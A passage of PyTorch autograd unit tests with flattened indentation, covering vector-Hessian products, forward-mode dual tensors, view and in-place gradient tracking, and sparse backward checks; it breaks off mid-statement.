self._assert_same_struct(res[1], inp)
def test_vhp_err_check_strict(self):
def foo(a):
return a.detach().sum()
def bar(a):
# Make a non-leaf Tensor that requires_grad but that is not connected to the input
return a.long().float().requires_grad_().clone().sum()
def bar2(a):
# A Linear function for which the jacobian is independent of the input
return (3 * a).sum()
inp = torch.rand(4)
v = torch.rand(4)
with self.assertRaisesRegex(RuntimeError, "Output 0 of the user-provided function does not require gradients."):
res = autogradF.vhp(foo, inp, v, strict=True)
res = autogradF.vhp(foo, inp, v, strict=False)
self._assert_same_struct(res[1], inp)
self.assertEqual(res[1].abs().sum(), 0.)
with self.assertRaisesRegex(RuntimeError, "The output of the user-provided function is independent of input 0"):
res = autogradF.vhp(bar, inp, v, strict=True)
res = autogradF.vhp(bar, inp, v, strict=False)
self._assert_same_struct(res[1], inp)
self.assertEqual(res[1].abs().sum(), 0.)
with self.assertRaisesRegex(RuntimeError, "jacobian of the user-provided function with respect to input 0 is"):
res = autogradF.vhp(bar2, inp, v, strict=True)
res = autogradF.vhp(bar2, inp, v, strict=False)
self._assert_same_struct(res[1], inp)
self.assertEqual(res[1].abs().sum(), 0.)
def test_vhp_no_grad(self):
def reducer(x):
return x.exp().sum()
inputs = torch.rand(4, 4)
v = torch.ones(4, 4)
with torch.no_grad():
res = autogradF.vhp(reducer, inputs, v)
self.assertIsNone(res[0].grad_fn)
self.assertIsNone(res[1].grad_fn)
self.assertNotEqual(res[1], torch.zeros(4, 4))
with torch.no_grad():
res = autogradF.vhp(reducer, inputs, v, create_graph=True)
self.assertIsNotNone(res[0].grad_fn)
self.assertIsNotNone(res[1].grad_fn)
self.assertNotEqual(res[1], torch.zeros(4, 4))
def test_vhp_output(self):
def foo(a):
return 3 * a.narrow(0, 0, 3).exp().sum()
inputs = torch.rand(4, 4)
v = torch.ones(4, 4)
res = autogradF.vhp(foo, inputs, v)
self._assert_same_struct(res[1], inputs)
self.assertIsNone(res[0].grad_fn)
self.assertIsNone(res[1].grad_fn)
def bar(a, b):
return (a + 3 * b.narrow(0, 0, 3)).exp().sum()
inputs = (torch.rand(3), torch.rand(4))
v = (torch.ones(3), torch.ones(4))
out, vhp_val = autogradF.vhp(bar, inputs, v)
self._assert_same_struct(vhp_val, inputs)
self.assertIsNone(out.grad_fn)
self.assertIsNone(vhp_val[0].grad_fn)
self.assertIsNone(vhp_val[1].grad_fn)
def test_vhp_scalar(self):
def reducer(x):
return x.sum()
inputs = torch.rand(4, 4)
v = torch.ones(4, 4)
res = autogradF.vhp(reducer, inputs, v)
self._assert_same_struct(res[1], inputs)
inputs = torch.rand([])
v = torch.rand([])
res = autogradF.vhp(reducer, inputs, v)
self._assert_same_struct(res[1], inputs)
res = autogradF.vhp(reducer, inputs)
self._assert_same_struct(res[1], inputs)
def bad_reducer(x):
return x.sum().view(1, 1, 1)
inputs = torch.rand(4, 4)
v = torch.rand(4, 4)
res = autogradF.vhp(bad_reducer, inputs, v)
self._assert_same_struct(res[1], inputs)
def test_vhp_create_graph(self):
def foo(a):
return 3 * a.narrow(0, 0, 3).exp().sum()
inputs = torch.rand(4, 4, dtype=torch.double, requires_grad=True)
v = torch.ones(4, 4, dtype=torch.double, requires_grad=True)
res = autogradF.vhp(foo, inputs, v, create_graph=True)
self._assert_same_struct(res[1], inputs)
self.assertIsNotNone(res[0].grad_fn)
self.assertIsNotNone(res[1].grad_fn)
gradcheck(lambda inp, v: autogradF.vhp(foo, inp, v, create_graph=True), (inputs, v))
gradgradcheck(lambda inp, v: autogradF.vhp(foo, inp, v, create_graph=True), (inputs, v))
def bar(a, b):
return (a + 3 * b.narrow(0, 0, 3)).exp().sum()
inputs = (torch.rand(3, dtype=torch.double, requires_grad=True),
torch.rand(4, dtype=torch.double, requires_grad=True))
v = (torch.ones(3, dtype=torch.double, requires_grad=True),
torch.ones(4, dtype=torch.double, requires_grad=True))
out, vhp_val = autogradF.vhp(bar, inputs, v, create_graph=True)
self._assert_same_struct(vhp_val, inputs)
self.assertIsNotNone(out.grad_fn)
self.assertIsNotNone(vhp_val[0].grad_fn)
self.assertIsNotNone(vhp_val[1].grad_fn)
gradcheck(lambda *args: autogradF.vhp(bar, args[:2], args[2:], create_graph=True)[1], inputs + v)
gradgradcheck(lambda *args: autogradF.vhp(bar, args[:2], args[2:], create_graph=True)[1], inputs + v)
def foo(*args):
x, y = args[:2]
v = args[2:]
x = x.cos()
val, grad = autogradF.vhp(bar, (x, y), v, create_graph=True)
return val.cos() + grad[0].cos().sum() + grad[1].cos() + x.cos().sum() + y.cos()
gradcheck(foo, inputs + v)
gradgradcheck(foo, inputs + v)
def test_hvp_err_check(self):
def foo(a):
return 3 * a.narrow(0, 0, 3).exp().sum()
def bar(a):
return 3 * a.narrow(0, 0, 3), "bar"
def bar2(a):
return 3 * a.narrow(0, 0, 3)
inp = torch.rand(4)
v = torch.rand(4)
res = autogradF.hvp(foo, inp, v)
with self.assertRaisesRegex(TypeError, "The inputs given to hvp must be either a Tensor"):
res = autogradF.hvp(foo, (inp, 2), v)
with self.assertRaisesRegex(TypeError, "The outputs of the user-provided function given to hvp must"):
res = autogradF.hvp(bar, inp, v)
err_msg_out = "The Tensor returned by the function given to hvp should contain a single element"
with self.assertRaisesRegex(RuntimeError, err_msg_out):
res = autogradF.hvp(bar2, inp, v)
with self.assertRaisesRegex(RuntimeError, "v has invalid size:"):
res = autogradF.hvp(foo, inp, torch.rand(5))
with self.assertRaisesRegex(TypeError, "The v given to hvp must be either a Tensor or a tuple of Tensors"):
res = autogradF.hvp(foo, inp, (v, 2))
res = autogradF.hvp(foo, inp, v)
self._assert_same_struct(res[1], inp)
def foo(a, b):
return (3 * b.narrow(0, 0, 3) * a.narrow(0, 0, 3)).sum()
inp = (torch.rand(4), torch.rand(5))
v = (torch.rand(4), torch.rand(5))
res = autogradF.hvp(foo, inp, v)
self._assert_same_struct(res[1], inp)
def test_hvp_err_check_strict(self):
def foo(a):
return a.detach().sum()
def bar(a):
# Make a non-leaf Tensor that requires_grad but that is not connected to the input
return a.long().float().requires_grad_().clone().sum()
def bar2(a):
# A Linear function for which the jacobian is independent of the input
return (3 * a).sum()
inp = torch.rand(4)
v = torch.rand(4)
with self.assertRaisesRegex(RuntimeError, "Output 0 of the user-provided function does not require gradients."):
res = autogradF.hvp(foo, inp, v, strict=True)
res = autogradF.hvp(foo, inp, v, strict=False)
self._assert_same_struct(res[1], inp)
self.assertEqual(res[1].abs().sum(), 0.)
with self.assertRaisesRegex(RuntimeError, "The output of the user-provided function is independent of input 0"):
res = autogradF.hvp(bar, inp, v, strict=True)
res = autogradF.hvp(bar, inp, v, strict=False)
self._assert_same_struct(res[1], inp)
self.assertEqual(res[1].abs().sum(), 0.)
with self.assertRaisesRegex(RuntimeError, "jacobian of the user-provided function with respect to input 0 is"):
res = autogradF.hvp(bar2, inp, v, strict=True)
res = autogradF.hvp(bar2, inp, v, strict=False)
self._assert_same_struct(res[1], inp)
self.assertEqual(res[1].abs().sum(), 0.)
def test_hvp_no_grad(self):
def reducer(x):
return x.exp().sum()
inputs = torch.rand(4, 4)
v = torch.ones(4, 4)
with torch.no_grad():
res = autogradF.hvp(reducer, inputs, v)
self.assertIsNone(res[0].grad_fn)
self.assertIsNone(res[1].grad_fn)
self.assertNotEqual(res[1], torch.zeros(4, 4))
with torch.no_grad():
res = autogradF.hvp(reducer, inputs, v, create_graph=True)
self.assertIsNotNone(res[0].grad_fn)
self.assertIsNotNone(res[1].grad_fn)
self.assertNotEqual(res[1], torch.zeros(4, 4))
def test_hvp_output(self):
def foo(a):
return 3 * a.narrow(0, 0, 3).exp().sum()
inputs = torch.rand(4, 4)
v = torch.ones(4, 4)
res = autogradF.hvp(foo, inputs, v)
self._assert_same_struct(res[1], inputs)
self.assertIsNone(res[0].grad_fn)
self.assertIsNone(res[1].grad_fn)
def bar(a, b):
return (a + 3 * b.narrow(0, 0, 3)).exp().sum()
inputs = (torch.rand(3), torch.rand(4))
v = (torch.ones(3), torch.ones(4))
out, hvp_val = autogradF.hvp(bar, inputs, v)
self._assert_same_struct(hvp_val, inputs)
self.assertIsNone(out.grad_fn)
self.assertIsNone(hvp_val[0].grad_fn)
self.assertIsNone(hvp_val[1].grad_fn)
def test_hvp_scalar(self):
def reducer(x):
return x.exp().sum()
inputs = torch.rand(4, 4)
v = torch.ones(4, 4)
res = autogradF.hvp(reducer, inputs, v)
self._assert_same_struct(res[1], inputs)
inputs = torch.rand([])
v = torch.rand([])
res = autogradF.hvp(reducer, inputs, v)
self._assert_same_struct(res[1], inputs)
res = autogradF.hvp(reducer, inputs)
self._assert_same_struct(res[1], inputs)
def bad_reducer(x):
return x.exp().sum().view(1, 1, 1)
inputs = torch.rand(4, 4)
v = torch.rand(4, 4)
res = autogradF.hvp(bad_reducer, inputs, v)
self._assert_same_struct(res[1], inputs)
def test_hvp_create_graph(self):
def foo(a):
return 3 * a.narrow(0, 0, 3).exp().sum()
inputs = torch.rand(4, 4, dtype=torch.double, requires_grad=True)
v = torch.ones(4, 4, dtype=torch.double, requires_grad=True)
res = autogradF.hvp(foo, inputs, v, create_graph=True)
self._assert_same_struct(res[1], inputs)
self.assertIsNotNone(res[0].grad_fn)
self.assertIsNotNone(res[1].grad_fn)
gradcheck(lambda inp, v: autogradF.hvp(foo, inp, v, create_graph=True), (inputs, v))
gradgradcheck(lambda inp, v: autogradF.hvp(foo, inp, v, create_graph=True), (inputs, v))
def bar(a, b):
return (a + 3 * b.narrow(0, 0, 3)).exp().sum()
inputs = (torch.rand(3, dtype=torch.double, requires_grad=True),
torch.rand(4, dtype=torch.double, requires_grad=True))
v = (torch.ones(3, dtype=torch.double, requires_grad=True),
torch.ones(4, dtype=torch.double, requires_grad=True))
out, hvp_val = autogradF.hvp(bar, inputs, v, create_graph=True)
self._assert_same_struct(hvp_val, inputs)
self.assertIsNotNone(out.grad_fn)
self.assertIsNotNone(hvp_val[0].grad_fn)
self.assertIsNotNone(hvp_val[1].grad_fn)
gradcheck(lambda *args: autogradF.hvp(bar, args[:2], args[2:], create_graph=True)[1], inputs + v)
gradgradcheck(lambda *args: autogradF.hvp(bar, args[:2], args[2:], create_graph=True)[1], inputs + v)
def foo(*args):
x, y = args[:2]
v = args[2:]
x = x.cos()
val, grad = autogradF.hvp(bar, (x, y), v, create_graph=True)
return val.cos() + grad[0].cos().sum() + grad[1].cos() + x.cos().sum() + y.cos()
gradcheck(foo, inputs + v)
gradgradcheck(foo, inputs + v)
def test_jacobian_match_vjp_jvp(self):
def foo(x):
return x ** 3 + x.sum()
inputs = torch.rand(4)
v = torch.rand(4)
jac = autogradF.jacobian(foo, inputs)
jvp = autogradF.jvp(foo, inputs, v)[1]
vjp = autogradF.vjp(foo, inputs, v)[1]
self.assertEqual(jvp, torch.mm(jac, v.unsqueeze(1)).squeeze(1))
self.assertEqual(vjp, torch.mm(v.unsqueeze(0), jac).squeeze(0))
def test_hessian_match_vhp_hvp(self):
def foo(a):
return 3 * a.narrow(0, 0, 3).exp().sum()
inputs = torch.rand(4)
v = torch.rand(4)
hes = autogradF.hessian(foo, inputs)
hvp = autogradF.hvp(foo, inputs, v)[1]
vhp = autogradF.vhp(foo, inputs, v)[1]
self.assertEqual(hvp, torch.mm(hes, v.unsqueeze(1)).squeeze(1))
self.assertEqual(vhp, torch.mm(v.unsqueeze(0), hes).squeeze(0))
class TestAutogradForwardModeBatchedGrad(TestCase):
def test_out_of_place_basic(self):
a = torch.rand(4, 4, dtype=torch.double, requires_grad=True)
b = torch.rand(4, 4, dtype=torch.double, requires_grad=True)
self.assertTrue(gradcheck(torch.sin, a, check_forward_ad=True, check_batched_grad=True,
check_batched_forward_grad=True))
self.assertTrue(gradcheck(torch.add, (a, b), check_forward_ad=True, check_batched_grad=True,
check_batched_forward_grad=True))
def test_out_of_place_not_same_layout(self):
input = torch.zeros([2, 2]).transpose(0, 1)
tangent = torch.zeros([2, 2, 2])
def jvp(tangent):
with fwAD.dual_level():
x = fwAD.make_dual(input, tangent)
return fwAD.unpack_dual(x)[1]
x_tangent = torch._vmap_internals._vmap(jvp, 0, 0)(tangent)
self.assertIsNot(x_tangent, tangent)
def test_inplace_on_view_same_layout(self):
input = torch.zeros([2, 2])
tangent = torch.zeros([2, 2, 2])
base = torch.zeros([2, 2])
view = base.view_as(base)
def jvp(tangent):
with fwAD.dual_level():
x = fwAD.make_dual(input, tangent)
view.copy_(x)
return fwAD.unpack_dual(x)[1], fwAD.unpack_dual(view)[1], fwAD.unpack_dual(view._base)[1]
x_tangent, view_tangent, base_tangent = torch._vmap_internals._vmap(jvp, 0, 0)(tangent)
self.assertFalse(view_tangent._is_view()) # Optimization to share the same tensor!
self.assertIs(view_tangent, base_tangent)
self.assertIs(x_tangent, tangent)
self.assertIs(view_tangent, tangent)
def test_inplace_on_view_not_same_layout(self):
input = torch.zeros([2, 2])
tangent = torch.zeros([2, 2, 2])
view = torch.zeros([2, 2]).transpose(0, 1)
def jvp(tangent):
with fwAD.dual_level():
x = fwAD.make_dual(input, tangent)
view.copy_(x)
return fwAD.unpack_dual(x)[1], fwAD.unpack_dual(view)[1], fwAD.unpack_dual(view._base)[1]
x_tangent, view_tangent, base_tangent = torch._vmap_internals._vmap(jvp, 0, 0)(tangent)
self.assertIs(view_tangent._base, base_tangent)
self.assertIs(x_tangent, tangent)
self.assertIsNot(view_tangent, tangent)
class TestAutogradForwardMode(TestCase):
def tearDown(self):
# Ensure that a failing test won't make others fail
while fwAD._current_level >= 0:
fwAD.exit_dual_level()
super().tearDown()
def test_forward_level_cleanup(self):
def get_tensor_and_weak_ref():
# Create a new Tensor and weak reference
t = torch.rand(2, requires_grad=True)
return t, torch._C._WeakTensorRef(t)
# Sanity check that the helper function works as expected
t, t_ref = get_tensor_and_weak_ref()
self.assertFalse(t_ref.expired())
del t
self.assertTrue(t_ref.expired())
# Main test code
foo = torch.rand(2)
with fwAD.dual_level():
tangent, tangent_ref = get_tensor_and_weak_ref()
self.assertFalse(tangent_ref.expired())
dual = fwAD.make_dual(foo, tangent)
self.assertFalse(tangent_ref.expired())
# Make sure that the tangent we provided has been re-used as is
self.assertTrue(fwAD.unpack_dual(dual)[1] is tangent)
# Make sure that dual is keeping the tangent alive
del tangent
self.assertFalse(tangent_ref.expired())
# Make sure that the dual level does not keep the c++
# version of the tangent alive
del dual
self.assertTrue(tangent_ref.expired())
def test_size_check(self):
foo = torch.rand(2)
tangent = torch.rand(3)
with fwAD.dual_level():
with self.assertRaisesRegex(RuntimeError, "Trying to set a forward gradient that has a different size"):
dual = fwAD.make_dual(foo, tangent)
dual = fwAD.make_dual(foo, tangent[1:])
# The following test functions want to ensure all the following behaviors:
# - Ensure that default level system in the python binding works
# - Ensure that only level 0 exists and nesting is properly disabled
# - Ensure that printing works fine
# - Ensure that basic packing/unpacking works
# - Ensure that advanced packing/unpacking works
# - For memory / version counter share
# - For backward AD (regular ops)
# - Ensure that view + inplace for both modes work fine
# - Ensure we do proper cleanup on exit of a level
def test_default_level(self):
foo = torch.rand(2)
bar = torch.rand(2)
with fwAD.dual_level():
baz = fwAD.make_dual(foo, bar)
baz_primal, baz_tangent = fwAD.unpack_dual(baz)
self.assertEqual(baz_primal, foo)
# We don't actually need to enforce that these two are the exact same python
# object, feel free to relax in the future
self.assertIs(baz_tangent, bar)
baz_primal, baz_tangent = fwAD.unpack_dual(baz)
self.assertEqual(baz_primal, foo)
self.assertEqual(baz_tangent, None)
def test_nested_level(self):
with fwAD.dual_level() as level:
# For now only level 0 exists
self.assertEqual(level, 0)
with fwAD.dual_level():
with self.assertRaisesRegex(RuntimeError, "Nested forward mode AD is not supported at the moment"):
nest_level = fwAD.enter_dual_level()
def test_set_fw_grad_having_own_fw_grad_at_same_level(self):
foo = torch.rand(2)
bar = torch.rand(2)
baz = torch.rand(2)
with fwAD.dual_level():
dual = fwAD.make_dual(foo, bar)
with self.assertRaisesRegex(RuntimeError, "has a forward gradient at the same level"):
fwAD.make_dual(baz, dual)
def test_make_dual_inference_tensor_in_inference_mode(self):
with torch.inference_mode():
foo = torch.rand(2)
bar = torch.rand(2)
foo_copy = foo.clone()
with fwAD.dual_level():
dual = fwAD.make_dual(foo, bar)
self.assertFalse(dual._is_view())
dual += 1
self.assertFalse(torch.allclose(foo, foo_copy))
def test_make_dual_torch_dispatch(self):
counter = [0]
class MySubclass(torch.Tensor):
def __new__(cls, data=None):
return torch.Tensor._make_subclass(cls, data)
@classmethod
def __torch_dispatch__(cls, func, types, args=(), kwargs=None):
if func == torch.ops.aten.alias:
counter[0] += 1
with no_dispatch():
return MySubclass(torch.ops.aten.alias(*args))
with no_dispatch():
return func(*args, **kwargs)
a = torch.tensor(1.)
s = MySubclass(a)
with fwAD.dual_level():
fwAD.make_dual(s, torch.rand_like(s))
self.assertEqual(counter[0], 1)
fwAD.make_dual(torch.rand_like(s), s)
self.assertEqual(counter[0], 2)
def test_print(self):
with fwAD.dual_level() as level:
a = torch.rand(3)
self.assertFalse("tangent=" in str(a))
b = fwAD.make_dual(a, torch.rand(3))
self.assertFalse("tangent=" in str(a))
self.assertTrue("tangent=" in str(b))
b_primal, b_tangent = fwAD.unpack_dual(b)
self.assertFalse("tangent=" in str(b_primal))
self.assertFalse("tangent=" in str(b_tangent))
def test_basic_packing_unpacking(self):
foo = torch.rand(2)
bar = torch.rand(2)
with fwAD.dual_level():
baz = fwAD.make_dual(foo, bar)
baz_primal, baz_tangent = fwAD.unpack_dual(baz)
self.assertEqual(baz_primal, foo)
self.assertIs(baz_tangent, bar)
# Check unpacked dual is returned as a named tuple
# NB: Every invocation of unpack_dual returns a new tensor view
self.assertIsNot(baz_primal, fwAD.unpack_dual(baz).primal)
self.assertEqual(baz_primal, fwAD.unpack_dual(baz).primal)
self.assertIs(baz_tangent, fwAD.unpack_dual(baz).tangent)
# Check that packing/unpacking did not change the input
foo_primal, foo_tangent = fwAD.unpack_dual(foo)
self.assertEqual(foo_primal, foo)
self.assertIsNone(foo_tangent)
def test_advanced_packing_unpacking(self):
foo = torch.rand(2)
bar = torch.ones(2)
# Memory and version counter check
with fwAD.dual_level():
dual = fwAD.make_dual(foo, bar)
# Ensure that they are sharing memory and version counter
self.assertEqual(dual.storage().data_ptr(), foo.storage().data_ptr())
# Ensure we properly share the version counter
self.assertEqual(foo._version, dual._version)
foo.add_(1)
self.assertEqual(foo._version, dual._version)
# Unpacking should only create aliases as well
dual_primal, dual_tangent = fwAD.unpack_dual(dual)
self.assertEqual(dual_primal.storage().data_ptr(), foo.storage().data_ptr())
self.assertEqual(dual_tangent.storage().data_ptr(), bar.storage().data_ptr())
# And the tangent is actually re-used as-is so it is still the same Tensor
self.assertIs(dual_tangent, bar)
# Ensure we properly share the version counter
self.assertEqual(foo._version, dual_primal._version)
foo.add_(1)
self.assertEqual(foo._version, dual_primal._version)
self.assertEqual(bar._version, dual_tangent._version)
bar.add_(1)
self.assertEqual(bar._version, dual_tangent._version)
# backward mode check
with fwAD.dual_level():
foo.requires_grad_()
bar.requires_grad_()
# Check that backward gradients properly propagates through packing/unpacking
dual = fwAD.make_dual(foo, bar)
p, t = fwAD.unpack_dual(dual)
gfoo, gbar = torch.autograd.grad(p.sum(), (foo, bar), retain_graph=True, allow_unused=True)
self.assertEqual(gfoo, torch.ones_like(foo))
self.assertIsNone(gbar)
gfoo, gbar = torch.autograd.grad(t.sum(), (foo, bar), retain_graph=True, allow_unused=True)
self.assertIsNone(gfoo)
self.assertEqual(gbar, torch.ones_like(bar))
# Check that forward gradients are impacted by detach()
detached_dual = dual.detach()
out = detached_dual * 2
p, t = fwAD.unpack_dual(out)
self.assertFalse(p.requires_grad)
self.assertEqual(p, foo * 2)
self.assertIsNone(t)
# Check that forward gradients are not impacted by no_grad
with torch.no_grad():
out = dual * 3
p, t = fwAD.unpack_dual(out)
self.assertFalse(p.requires_grad)
self.assertFalse(t.requires_grad)
self.assertEqual(p, foo * 3)
self.assertEqual(t, bar * 3)
# Check that forward gradients are not impacted by inplace detach
dual = dual.clone()
dual.detach_()
out = dual * 2
p, t = fwAD.unpack_dual(out)
self.assertFalse(p.requires_grad)
self.assertEqual(p, foo * 2)
self.assertIsNone(t)
def test_view_inplace_non_differentiable_views(self):
original_foo = torch.rand(2, dtype=torch.double)
original_bar = torch.ones(2, dtype=torch.double)
# Do clones to be able to compare the values updated inplace
# with the original content of these Tensors
foo = original_foo.clone()
bar = original_bar.clone()
with fwAD.dual_level():
# Note that in this test, we use "update" to mean computing the right tangent for the dual
# All the inplace operations here are expected to update the primal value of the Tensors but
# not always their tangents.
# Also all mentions of "non differentiable view" here means non forward differentiable view
# unless specified otherwise.
# See note [Forward Grad View/inplace] for more details on how these views work.
# Check that inplace ops do not update non-differentiable views
# Non differentiable view
dual = fwAD.make_dual(foo, bar)
dual *= 2
# Check that non differentiable view's tangent was not updated
self.assertIsNone(fwAD.unpack_dual(foo)[1])
# Check that the computed result is correct
self.assertEqual(bar, original_bar * 2)
self.assertEqual(fwAD.unpack_dual(dual)[1], original_bar * 2)
self.assertEqual(foo, original_foo * 2)
self.assertEqual(fwAD.unpack_dual(dual)[0], original_foo * 2)
# Other non differentiable view
dual_primal, dual_tangent = fwAD.unpack_dual(dual)
self.assertIsNone(fwAD.unpack_dual(dual_primal)[1])
self.assertIsNone(fwAD.unpack_dual(dual_tangent)[1])
dual_primal *= 2
# Ensure dual's tangent did not change
self.assertEqual(fwAD.unpack_dual(dual)[0], original_foo * 4)
self.assertEqual(fwAD.unpack_dual(dual)[1], original_bar * 2)
dual_tangent *= 2
# Ensure dual's primal did not change
self.assertEqual(fwAD.unpack_dual(dual)[0], original_foo * 4)
self.assertEqual(fwAD.unpack_dual(dual)[1], original_bar * 4)
def test_view_inplace_differentiable_views(self):
original_foo = torch.rand(2)
original_bar = torch.ones(2)
# Do clones to be able to compare the values updated inplace
# with the original content of these Tensors
foo = original_foo.clone()
bar = original_bar.clone()
with fwAD.dual_level():
# Check that inplace ops do update differentiable view but stop at non differentiable ones
# A non differentiable view
dual = fwAD.make_dual(foo, bar)
# A differentiable view
view = dual.narrow(0, 0, 1)
view *= 2
# Check that non differentiable view was not updated
self.assertIsNone(fwAD.unpack_dual(foo)[1])
# Check that differentiable view was updated
self.assertEqual(fwAD.unpack_dual(dual)[1], torch.tensor([2., 1.]))
self.assertEqual(fwAD.unpack_dual(view)[1], torch.tensor([2.]))
# Check that we track differentiable view even for Tensors that are not dual
baz = torch.rand(2)
baz += dual
self.assertEqual(fwAD.unpack_dual(baz)[1], fwAD.unpack_dual(dual)[1])
# Updates on view should as well
baz = torch.rand(2)
baz[0] = dual[0]
self.assertEqual(fwAD.unpack_dual(baz)[1][0], fwAD.unpack_dual(dual)[1][0])
# Unused values get a gradient of 0
self.assertEqual(fwAD.unpack_dual(baz)[1][1], 0.)
# Check that forward non-differentiable views do prevent gradient update
baz = torch.rand(2)
view = baz.detach()
view += dual
self.assertIsNone(fwAD.unpack_dual(baz)[1])
def test_view_inplace_always_creates_a_view(self):
# See https://github.com/pytorch/pytorch/issues/67800
# The codepath may depend on the op. At the time writing, when self is not a dual tensor
# the resulting forward grad for self for...
# - add_ has the same layout as self
# - mul_ has the same layout as other
# This is kind of fragile because the above depends on how the forward grad expression
# is written. For add and mul at least, the output inherits the layout of LHS.
# We want to handle at least these two cases.
inplace_binary_ops = ( # Add more to this list?
lambda x, y: x.add_(y),
lambda x, y: x.mul_(y),
lambda x, y: x.copy_(y),
)
for inplace_binary_op in inplace_binary_ops:
base = torch.randn(2, 2)
view = base.transpose(0, 1)
primal = torch.randn(2, 2)
tangent = torch.randn(2, 2)
with fwAD.dual_level():
dual = fwAD.make_dual(primal, tangent)
inplace_binary_op(view, dual)
# Verify that a view relationship is created for both the primal and tangent
p, t = fwAD.unpack_dual(base)
p_clone = p.clone()
t_clone = t.clone()
view *= 2
p, t = fwAD.unpack_dual(base)
self.assertTrue(torch.allclose(p_clone * 2, p))
self.assertTrue(torch.allclose(t_clone * 2, t))
def test_grad_cleanup(self):
foo = torch.rand(2)
bar = torch.rand(2)
baz = torch.rand(2)
with fwAD.dual_level():
dual = fwAD.make_dual(foo, bar)
self.assertIsNone(fwAD.unpack_dual(foo)[1])
self.assertIs(fwAD.unpack_dual(dual)[1], bar)
self.assertIsNone(fwAD.unpack_dual(dual)[1])
with fwAD.dual_level():
self.assertIsNone(fwAD.unpack_dual(foo)[1])
new_dual = fwAD.make_dual(foo, baz)
dual_primal, dual_tangent = fwAD.unpack_dual(dual)
new_dual_primal, new_dual_tangent = fwAD.unpack_dual(new_dual)
self.assertEqual(dual_primal, new_dual_primal)
self.assertIsNone(dual_tangent)
self.assertEqual(new_dual_tangent, baz)
def test_detach_view_tracking(self):
# Default detach is both forward and backward non-differentiable
foo = torch.rand(2)
foo_weak = torch._C._WeakTensorRef(foo)
out = foo.detach()
del foo
self.assertTrue(foo_weak.expired())
def test_out_variant(self):
with fwAD.dual_level():
foo = fwAD.make_dual(torch.rand(2), torch.rand(2))
bar = torch.rand(2)
with self.assertRaisesRegex(RuntimeError, "out= function"):
torch.add(bar, bar, out=foo)
with self.assertRaisesRegex(RuntimeError, "out= function"):
torch.add(foo, bar, out=bar)
def test_non_differentiable(self):
with fwAD.dual_level():
foo = fwAD.make_dual(torch.rand(2), torch.rand(2))
bar = torch.rand(2)
# No differentiable outputs, shouldn't error
eq = foo == bar
def test_create_new_zeros_with_same_meta(self):
new_zeroes_fn = torch.ops.aten._new_zeros_with_same_feature_meta
def check(a, b):
def assert_same_meta(t, target):
for num_bdim in range(t.dim()):
result = new_zeroes_fn(t, target, self_num_batch_dims=num_bdim)
self.assertEqual(result.dim(), target.dim() + num_bdim)
# Check size/strides match for feature dims only
for i in range(num_bdim, result.dim()):
self.assertEqual(result.size()[i], target.size()[i - num_bdim])
self.assertEqual(result.stride()[i], target.stride()[i - num_bdim])
# Check that we generate strides reasonably
if target.is_contiguous():
self.assertTrue(result.is_contiguous())
self.assertEqual(result.storage_offset(), target.storage_offset())
prod_of_t_bdims = reduce(operator.mul, t.size()[:num_bdim], 1)
self.assertEqual(len(result.storage()), len(target.storage()) * prod_of_t_bdims)
# TensorOptions is same
self.assertEqual(result.dtype, target.dtype)
assert_same_meta(a, b)
assert_same_meta(b, a)
a = torch.randn(5, dtype=torch.float)
b = torch.randn(2, 3, 4, dtype=torch.double)
check(a, b)
# non-contiguous case
a = torch.randn(2, 3, 4).transpose(0, 1).contiguous().transpose(0, 1)
b = torch.randn(2, 3, 4)
check(a, b)
a = torch.randn(5).narrow(0, 1, 2)
b = torch.randn(2)
check(a, b)
# tensor is not a view, but still does not index entirety of storage
a = torch.randn(5).resize_(4)
b = torch.randn(4)
check(a, b)
# Zero-numel tensors
a = torch.randn(1, 0, 2)
b = torch.randn(1, 2)
check(a, b)
# Scalar tensor
a = torch.tensor(1.)
b = torch.randn(1, 2)
check(a, b)
def test_backward_graph_destruction(self):
def fn():
a = torch.rand(10, requires_grad=True)
da = fwAD.make_dual(torch.rand_like(a), a)
# Create an object with a c++ cycle as:
# db -> AutogradMeta -> ForwardGrad -> db's grad
# db's grad -> AutogradMeta -> MulBackward
# MulBackward -> SavedVariable -> db
db = da.exp()
with fwAD.dual_level():
fn()
# This test make sure that we don't deadlock on exit of this
# context manager. If you do, there is something wrong with the
# locking of the forward ad level most likely
# Generic device type autograd tests.
class TestAutogradDeviceType(TestCase):
def test_min_max_median_backprops_to_all_values(self, device):
for f in [torch.min, torch.max, torch.median, torch.nanmedian]:
x1 = torch.tensor([1., 0., 1., 0., 1., 0.], device=device, requires_grad=True)
x2 = torch.tensor([float('nan'), float('nan'), float('nan')], requires_grad=True)
for x in [x1, x2]:
y = f(x)
y.backward()
self.assertEqual(x.grad.sum(), 1.)
self.assertEqual((x.grad == 1 / 3).sum(), 3)
def test_parameter_resize(self, device):
asd = torch.nn.Parameter(torch.ones(16, dtype=torch.double, device=device))
for i in range(2):
with torch.no_grad():
asd.set_(asd[1:])
asd.grad = None
m = torch.cat((asd, asd))
m.sum().backward()
@dtypes(torch.double, torch.cdouble)
def test_sparse_ctor_getter_backward(self, device, dtype):
# See NOTE [ Sparse: autograd and API ] on the expected behavior of this test
def _test(size, sparse_dim, nnz, device):
v_size = [nnz] + list(size[sparse_dim:])
i = torch.rand(sparse_dim, nnz)
i.mul_(torch.tensor(size[:sparse_dim]).unsqueeze(1).to(i))
i = i.to(torch.long)
inp = torch.randn(v_size, dtype=torch.double, device=device, requires_grad=True)
other = self.genSparseTensor(size, sparse_dim, nnz, is_uncoalesced=True, device=device,
dtype=dtype)[0]
def fn(v):
x = torch.sparse_coo_tensor(i, v, size, dtype=dtype, device=device)
y = (x + other).coalesce()
yv = y.values()
new_v = yv.tanh()
z = torch.sparse_coo_tensor(y.indices(), new_v, y.size())
return z.coalesce().values()
gradcheck(fn, (inp,), check_batched_grad=False)
# FIXME: make gradgradcheck work.
# gradgradcheck(fn, (inp,), check_batched_grad=False)
# assert that _values is non-differentiable
with self.assertRaisesRegex(RuntimeError, "does not have a grad_fn"):
other.detach().requires_grad_()._values().backward(torch.ones_like(other._values()))
for empty_i, empty_v, empty_nnz in product([True, False], repeat=3):
sparse_size = [] if empty_i else [2, 1]
dense_size = [1, 0, 2] if empty_v else [1, 2]
nnz = 0 if empty_nnz else 5
_test(sparse_size + dense_size, len(sparse_size), nnz, device)
@skipMeta
@dtypes(torch.double, torch.cdouble)
def test_sparse_backward(self, device, dtype):
class FixedGradientFunction(Function):
@staticmethod
def forward(ctx, x, grad_x):
ctx.save_for_backward(grad_x)
return x
@staticmethod
def backward(ctx, grad_x):
saved_grad_x, = ctx.saved_tensors
return saved_grad_x, None
size = torch.Size([6, 3, 2])
i1 = torch.tensor([
